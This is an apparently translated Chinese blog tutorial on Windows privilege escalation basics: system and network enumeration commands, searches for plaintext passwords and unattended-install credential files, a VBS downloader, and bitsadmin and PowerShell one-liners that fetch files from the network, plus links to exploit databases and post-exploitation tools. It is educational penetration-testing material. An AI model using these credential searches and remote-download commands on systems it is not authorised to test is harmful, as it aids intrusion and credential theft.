?

Sep 21 2016

windows權限提升基礎知識

首頁 » 滲透測試 » windows權限提升基礎知識   

 

1.jpg

介紹


這篇文章是介紹window的權限提升,雖然不是一個全面的指南,但會試圖覆蓋主要的技術,常用的資源列表在文章底部,可供大家參考。


window權限提升基礎知識


初始信息收集

在開始提權之前,我們需要了解操作系統基本的信息,如安裝軟件,操作系統版本,連接用戶,端口進程等信息,

確定操作系統名稱和版本

1
C:\Users\sanr> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

查看主機名

1
C:\Users\sanr> hostname

查看所有環境變量

1
C:\Users\sanr> SET

查看用戶跟用戶詳細信息

1
2
C:\Users\sanr> net user
C:\Users\sanr> net user sanr

查看在線用戶

1
C:\Users\sanr> query user

查詢終端端口

1
C:\Users\sanr> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

網絡連接

讓我們來看看該系統的網絡設置 - 基本網絡,路由,防火墻等。

查看ip dns地址

1
C:\Users\sanr>ipconfig /all

要查看路由表

1
C:\Users\sanr> route print

要查看ARP緩存:

1
C:\Users\sanr> arp -A

查看網絡連接

1
C:\Users\sanr> netstat -ano

要查看防火墻規則:

1
2
3
C:\Users\sanr> netstat -ano
C:\Users\sanr> netsh firewall show config 
C:\Users\sanr> netsh firewall show state

應用程序和服務

查看系統上的計劃任務

1
C:\Users\sanr> schtasks /QUERY /fo LIST /v

要查看服務的進程ID:

1
C:\Users\sanr> tasklist /SVC

要查看已安裝驅動程序的列表:

1
C:\Users\sanr> DRIVERQUERY

查看已經啟動Windows 服務

1
C:\Users\sanr> net start

查看某服務啟動權限

1
2
3
4
5
6
7
8
9
10
11
12
C:\Users\sanr> sc qc mysqla
[SC] QueryServiceConfig 成功
SERVICE_NAME: mysqla
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "D:\Program Files\phpstudy\mysql\bin\mysqld.exe" MySQLa
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MySQLa
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

利用WMIC獲取有價值的數據

查看其版本的已安裝程序的列表

1
C:\Users\sanr> wmic product list brief

查看服務,進程或啟動程序的列表:

1
2
3
C:\Users\sanr> wmic service list brief # Lists services
C:\Users\sanr> wmic process list brief # Lists processes
C:\Users\sanr> wmic startup list brief # Lists startup items

檢查已安裝的更新和安裝日期

1
C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn

搜索,您可以使用提升權限的特定漏洞

1
2
C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx" 
# Replace with a patch version that you are searching for. Eg - KB3000061

執行上面的命令的沒有輸出,意味著那個補丁未安裝。

敏感數據和directories

檢查未加密的密碼,或敏感信息的文件多汁:

1
2
3
4
5
C:\Users\sanr> cd/ 
C:\Users\sanr> dir /b/s password.txt # Will search for all password.txt files on the filesystem.
C:\Users\sanr> dir /b/s config.* # Will search for all files starting with 'config' on the filesystem.
C:\Users\sanr> findstr /si password *.xml *.ini *.txt 
C:\Users\sanr> findstr /si login *.xml *.ini *.txt

除此之外,您還可以檢查無人值守安裝日志文件。這些文件通常包含base64編碼的密碼。你更可能在大型企業中,其中單個系統的手動安裝是不切實際的找到這些文件。這些文件的共同位置是:

1
2
3
4
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml

目錄文件操作

列出d:\www的所有目錄:

1
for /d %i in (d:\www\*) do @echo %i

把當前路徑下文件夾的名字只有1-3個字母的顯示出來:

1
for /d %i in (???) do @echo %i

以當前目錄為搜索路徑,把當前目錄與下面的子目錄的全部EXE文件列出:

1
for /r %i in (*.exe) do @echo %i

以指定目錄為搜索路徑,把當前目錄與下面的子目錄的所有文件列出

1
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i

顯示a.txt里面的內容,因為/f的作用,會讀出a.txt中:

1
2
3
4
5
6
7
8
9
10
11
12
for /f %i in (c:\1.txt) do echo %i
RAR 打包
C:\Users\sanr> rar a -k -r -s -m3 c:\1.rar c:\folde
php讀文件 
C:\Users\sanr> c:/php/php.exe "c:/www/admin/1.php" 
<?php
$file_handle = fopen("f:/config.asp", "r");
while (! feof($file_handle)) {
  echo fgets($file_handle);
}
fclose($file_handle);
?>

利用系統程序,文件下載

擁有了這些信息,我們現在可以開始實際提升我們的特權的過程。

利用vbs來讓我們上傳文件,是一個vbs下載者,原理是下載文件到這臺計算機(需要訪問網絡):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
' downloadfile.vbs 
' Set your settings
strFileURL = "http://127.0.0.1/text.ico"
strHDLocation = "d:\text.ico"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

這個腳本可以在任何版本的Windows上運行,要執行它,如下。

1
C:\Users\sanr> script.exe downloadfile.vbs

如果操作系統是Windows7及以上的,使用的bitsadmin跟powershell:

1
2
C:\Users\sanr> bitsadmin /transfer n http://www.jd.com/favicon.ico d:\text.ico
C:\Users\sanr> powershell (new-object System.Net.WebClient).DownloadFile('http://www.jd.com/favicon.ico','text.ico')

下載文件方式還有一些其他的方式,比如ftp php python,可根據自己的需求來選擇。


其他資源


搜索exp跟shellcode

http://www.exploit-db.com

http://1337day.com

http://0day.today

http://www.securityfocus.com

http://seclists.org/fulldisclosure/

http://www.exploitsearch.net

http://www.securiteam.com

http://metasploit.com/modules/

http://securityreason.com

https://cxsecurity.com/exploit/

http://securitytracker.com/

優秀的文章,工具,資源,指南

rmusser01's GitHub document to Post Exploitation on Windows

Tim Arneaud on Windows Privilege Escalation

An article on WMIC

Luke Jennings on Group Policy Hijacking Attacks

Toying with the Windows API

enaqx - Excellent curated collection of content

PowerShellMafia's PowerSploit

The SysInternals suite

Windows Credential Editor

Mimikatz - Credential Extraction

GDSSecurity's Windows Exploit Suggester

SpiderLab's Responder - A LLMNR, NBT-NS and MDNS poisoner

PowerShellEmpire's Empire - Pure PowerShell post-exploitation agent

rabbitstack's fibratus - A tool for exploration and tracing of the Windows kernel

本文由 安全客 翻譯,轉載請注明“轉自安全客”,并附上鏈接。
原文鏈接:https://thel3l.me/blog/winprivesc/index.html

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: 權限提升

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «俄黑客組織再爆第三批資料 | Metasploit 反序列化漏洞,可遠程非授權執行代碼(含exp,9/21 06點更新)»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖